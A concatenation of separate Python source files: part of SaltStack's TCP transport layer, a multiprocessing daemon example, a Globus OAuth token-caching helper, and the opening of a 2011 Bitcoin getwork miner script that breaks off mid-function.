salt.transport.frame.frame_msg(
self._encrypt_private(ret, req_opts["key"], req_opts["tgt"],),
header=header,
)
)
else:
log.error("Unknown req_fun %s", req_fun)
# always attempt to return an error to the minion
stream.write("Server-side exception handling payload")
stream.close()
except salt.ext.tornado.gen.Return:
raise
except salt.ext.tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error("Connection was unexpectedly closed", exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error("Unexpected exception occurred: %s", exc, exc_info=True)
raise salt.ext.tornado.gen.Return()
class SaltMessageServer(salt.ext.tornado.tcpserver.TCPServer):
"""
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
"""
def __init__(self, message_handler, *args, **kwargs):
io_loop = (
kwargs.pop("io_loop", None) or salt.ext.tornado.ioloop.IOLoop.current()
)
self._closing = False
super().__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
self.message_handler = message_handler
@salt.ext.tornado.gen.coroutine
def handle_stream(self, stream, address):
"""
Handle incoming streams and add messages to the incoming queue
"""
log.trace("Req client %s connected", address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
header = framed_msg["head"]
self.io_loop.spawn_callback(
self.message_handler, stream, header, framed_msg["body"]
)
except salt.ext.tornado.iostream.StreamClosedError:
log.trace("req client disconnected %s", address)
self.remove_client((stream, address))
except Exception as e: # pylint: disable=broad-except
log.trace("other master-side exception: %s", e)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
"""
Shutdown the whole server
"""
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.shutdown() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
"""
Close the server
"""
if self._closing:
return
self._closing = True
for item in self.clients:
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except OSError as exc:
if exc.errno != 9:
raise
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
"""
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
"""
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super().__init__(message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.stop() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
self._stop.set()
self.thread.join()
super().close()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'salt.ext.tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address
)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(salt.ext.tornado.tcpclient.TCPClient):
"""
Override _create_stream() in TCPClient to enable keep alive support.
"""
def __init__(self, opts, resolver=None):
self.opts = opts
super().__init__(resolver=resolver)
def _create_stream(
self, max_buffer_size, af, addr, **kwargs
): # pylint: disable=unused-argument,arguments-differ
"""
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
"""
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = salt.ext.tornado.iostream.IOStream(
sock, max_buffer_size=max_buffer_size
)
if salt.ext.tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
"""
Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
"""
def __init__(self, opts, args=None, kwargs=None):
super().__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@salt.ext.tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
yield futures
raise salt.ext.tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient:
"""
Low-level message sending client
"""
def __init__(
self,
opts,
host,
port,
io_loop=None,
resolver=None,
connect_callback=None,
disconnect_callback=None,
source_ip=None,
source_port=None,
):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or salt.ext.tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = salt.ext.tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, "_stream") and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = salt.ext.tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
if (
self.io_loop
!= salt.ext.tornado.ioloop.IOLoop.current(instance=False)
or not self._stream_return_future.done()
):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self._stop_io_loop(),
)
self.io_loop.start()
except Exception as e: # pylint: disable=broad-except
log.info("Exception caught in SaltMessageClient.close: %s", str(e))
finally:
orig_loop.make_current()
self._tcp_client.close()
self.io_loop = None
self._read_until_future = None
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def connect(self):
"""
Ask for this client to reconnect to the origin
"""
if hasattr(self, "_connecting_future") and not self._connecting_future.done():
future = self._connecting_future
else:
future = salt.ext.tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@salt.ext.tornado.gen.coroutine
def _connect(self):
"""
Try to connect for the rest of time!
"""
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if salt.ext.tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {
"source_ip": self.source_ip,
"source_port": self.source_port,
}
else:
log.warning(
"If you need a certain source IP/port, consider upgrading Tornado >= 4.5"
)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(
self.host, self.port, ssl_options=self.opts.get("ssl"), **kwargs
)
self._connecting_future.set_result(True)
break
except Exception as exc: # pylint: disable=broad-except
log.warning(
"TCP Message Client encountered an exception while connecting to %s:%s: %r",
self.host,
self.port,
exc,
)
yield salt.ext.tornado.gen.sleep(1) # TODO: backoff
# self._connecting_future.set_exception(exc)
@salt.ext.tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(
4096, partial=True
)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg["head"]
body = framed_msg["body"]
message_id = header.get("mid")
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error(
"Got response for message_id %s that we are not tracking",
message_id,
)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug(
"tcp stream to %s:%s closed, unable to recv",
self.host,
self.port,
)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if "detect_mode" in self.opts:
log.info(
"There was an error trying to use TCP transport; "
"attempting to fallback to another transport"
)
else:
raise SaltClientError
except Exception as e: # pylint: disable=broad-except
log.error("Exception parsing response", exc_info=True)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@salt.ext.tornado.gen.coroutine
def _stream_send(self):
while (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except salt.ext.tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception("Unable to find available messageid")
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
"""
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(
SaltReqTimeoutError("Message timed out")
)
def send(self, msg, timeout=None, callback=None, raw=False):
"""
Send given message, and return a future
"""
message_id = self._message_id()
header = {"mid": message_id}
future = salt.ext.tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(
timeout, self.timeout_message, message_id
)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append(
(message_id, salt.transport.frame.frame_msg(msg, header=header))
)
return future
class Subscriber:
"""
Client object for use with the TCP publisher server
"""
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(salt.ext.tornado.tcpserver.TCPServer):
"""
TCP publisher
"""
def __init__(self, opts, io_loop=None):
super().__init__(ssl_options=opts.get("ssl"))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.event = None
self.presence_events = False
if self.opts.get("presence_events", False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != "tcp":
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
"master", opts=self.opts, listen=False
)
else:
self.event = None
def close(self):
if self._closing:
return
self._closing = True
if self.event is not None:
self.event.destroy()
self.event = None
if self.aes_funcs is not None:
self.aes_funcs.destroy()
self.aes_funcs = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {"new": [id_], "lost": []}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {"new": [], "lost": [id_]}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
@salt.ext.tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
body = framed_msg["body"]
if body["enc"] != "aes":
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
load = crypticle.loads(body["load"])
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load["id"], load["tok"]):
continue
client.id_ = load["id"]
self._add_client_present(client)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug("tcp stream to %s closed, unable to recv", client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e: # pylint: disable=broad-except
log.error(
"Exception parsing response from %s", client.address, exc_info=True
)
continue
def handle_stream(self, stream, address):
log.trace("Subscriber at %s connected", address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@salt.ext.tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug("TCP PubServer sending payload: %s", package)
payload = salt.transport.frame.frame_msg(package["payload"])
to_remove = []
if "topic_lst" in package:
topic_lst = package["topic_lst"]
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug("Publish target %s not connected", topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug(
"Subscriber at %s has disconnected from publisher", client.address
)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace("TCP PubServer finished publishing payload")
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state["secrets"]
self.__init__(state["opts"])
def __getstate__(self):
return {"opts": self.opts, "secrets": salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
"""
Bind to the interface specified in the configuration file
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get("log_queue")
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get("log_queue_level")
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts["interface"], int(self.opts["publish_port"])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri, io_loop=self.io_loop, payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
finally:
pull_sock.close()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
"""
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
"""
Publish "load" to minions
"""
payload = {"enc": "aes"}
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
payload["load"] = crypticle.dumps(load)
if self.opts["sign_pub_messages"]:
master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem")
log.debug("Signing data packet")
payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"])
# Use the Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
# TODO: switch to the actual asynchronous interface
# pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient, (pull_uri,), loop_kwarg="io_loop",
)
pub_sock.connect()
int_payload = {"payload": self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load["tgt_type"] == "list" and not self.opts.get("order_masters", False):
if isinstance(load["tgt"], str):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(
load["tgt"], tgt_type=load["tgt_type"]
)
match_ids = _res["minions"]
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload["topic_lst"] = match_ids
else:
int_payload["topic_lst"] = load["tgt"]
# Send it over IPC!
pub_sock.send(int_payload)
|
32.multiprocessing_daemonprocess.py
|
import multiprocessing
import time
import sys
def daemon():
p = multiprocessing.current_process()
print('Starting:', p.name, p.pid)
sys.stdout.flush()
time.sleep(2)
print('Exiting :', p.name, p.pid)
sys.stdout.flush()
def non_daemon():
p = multiprocessing.current_process()
print('Starting:', p.name, p.pid)
sys.stdout.flush()
print('Exiting :', p.name, p.pid)
sys.stdout.flush()
if __name__ == '__main__':
d = multiprocessing.Process(name='daemon', target=daemon)
d.daemon = True
n = multiprocessing.Process(name='non-daemon', target=non_daemon)
n.daemon = False
d.start()
time.sleep(1)
n.start()
|
auth.py
|
"""
Globus Auth Helpers.
"""
# A lot of this code is copied from the Globus Auth Example repo:
# https://github.com/globus/native-app-examples
import json
import stat
import queue
import functools
import threading
import webbrowser
from pathlib import Path
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import parse_qs, urlparse
import appdirs
import globus_sdk
import globus_sdk.auth.token_response
CLIENT_ID = 'dd2d62af-0b44-4e2e-9454-1092c94b46b3'
SCOPES = ('urn:globus:auth:scope:transfer.api.globus.org:all',
'openid')
__all__ = ['ensure_globus_authorized', 'get_refresh_token_authorizer']
class AuthenticationError(Exception):
"""
An error to be raised if authentication fails.
"""
class RedirectHTTPServer(HTTPServer):
def __init__(self, listen, handler_class):
super().__init__(listen, handler_class)
self._auth_code_queue = queue.Queue()
def return_code(self, code):
self._auth_code_queue.put_nowait(code)
def wait_for_code(self):
return self._auth_code_queue.get(block=True)
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(b'You\'re all set, you can close this window!')
code = parse_qs(urlparse(self.path).query).get('code', [''])[0]
self.server.return_code(code)
def log_message(self, format, *args):
return
def start_local_server(listen=('localhost', 0)):
"""
Start a server which will listen for the OAuth2 callback.
Parameters
----------
listen: `tuple`, optional
``(address, port)`` tuple, defaults to localhost and port 0, which
leads to the system choosing a free port.
"""
server = RedirectHTTPServer(listen, RedirectHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
def get_cache_file_path():
"""
Use appdirs to get the cache path for the user and add the filename.
"""
cache_dir = Path(appdirs.user_cache_dir("dkist"))
return cache_dir / "globus_auth_cache.json"
def get_cache_contents():
"""
Read the cache file, return an empty dict if not found or invalid.
"""
cache_file = get_cache_file_path()
if not cache_file.exists():
return {}
else:
try:
with open(cache_file) as fd:
return json.load(fd)
except (IOError, json.JSONDecodeError):
return {}
def save_auth_cache(auth_cache):
"""
Write the auth cache to the cache file.
Parameters
----------
auth_cache: `dict` or `~globus_sdk.auth.token_response.OAuthTokenResponse`
The auth cache to save.
"""
if isinstance(auth_cache, globus_sdk.auth.token_response.OAuthTokenResponse):
auth_cache = auth_cache.by_resource_server
cache_file = get_cache_file_path()
# Ensure the cache dir exists.
cache_dir = cache_file.parent
if not cache_dir.exists():
cache_dir.mkdir(parents=True)
# Write the token to the cache file.
with open(cache_file, "w") as fd:
json.dump(auth_cache, fd)
# Ensure the token file has minimal permissions.
cache_file.chmod(stat.S_IRUSR | stat.S_IWUSR)
def do_native_app_authentication(client_id, requested_scopes=None): # pragma: no cover
"""
Does a Native App authentication flow and returns a
dict of tokens keyed by service name.
"""
server = start_local_server()
redirect_uri = "http://{a[0]}:{a[1]}".format(a=server.server_address)
client = globus_sdk.NativeAppAuthClient(client_id=client_id)
client.oauth2_start_flow(requested_scopes=SCOPES,
redirect_uri=redirect_uri,
refresh_tokens=True)
url = client.oauth2_get_authorize_url()
result = webbrowser.open(url, new=1)
if not result:
print(f"Please go to {url} to authenticate with globus.")
print("Waiting for completion of Globus Authentication in your webbrowser...")
try:
auth_code = server.wait_for_code()
except KeyboardInterrupt:
raise AuthenticationError("Failed to authenticate with Globus.")
finally:
server.shutdown()
token_response = client.oauth2_exchange_code_for_tokens(auth_code)
# return a set of tokens, organized by resource server name
return token_response.by_resource_server
def get_refresh_token_authorizer(force_reauth=False):
"""
Perform OAuth2 Authentication to Globus.
Parameters
----------
force_reauth: `bool`, optional
If `True` ignore any cached credentials and reauth with Globus. This is
useful if the cache is corrupted or the refresh token has expired.
Returns
-------
`globus_sdk.RefreshTokenAuthorizer`
"""
tokens = None
if not force_reauth:
tokens = get_cache_contents()
if not tokens:
tokens = do_native_app_authentication(CLIENT_ID, SCOPES)
save_auth_cache(tokens)
auth_client = globus_sdk.NativeAppAuthClient(client_id=CLIENT_ID)
transfer_tokens = tokens['transfer.api.globus.org']
authorizers = {}
for scope, transfer_tokens in tokens.items():
authorizers[scope] = globus_sdk.RefreshTokenAuthorizer(
transfer_tokens['refresh_token'],
auth_client,
access_token=transfer_tokens['access_token'],
expires_at=transfer_tokens['expires_at_seconds'],
on_refresh=save_auth_cache)
return authorizers
def ensure_globus_authorized(func):
"""
A wrapper for functions that need valid globus authorization.
If the refresh token is invalid this function will prompt the user to
login.
"""
@functools.wraps(func)
def do_reauth(*args, **kwargs):
try:
return func(*args, **kwargs)
except globus_sdk.AuthAPIError as e:
if e.http_status == 400 and e.message == "invalid_grant":
print("Globus login has expired.")
get_refresh_token_authorizer(force_reauth=True)
return func(*args, **kwargs)
return do_reauth
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
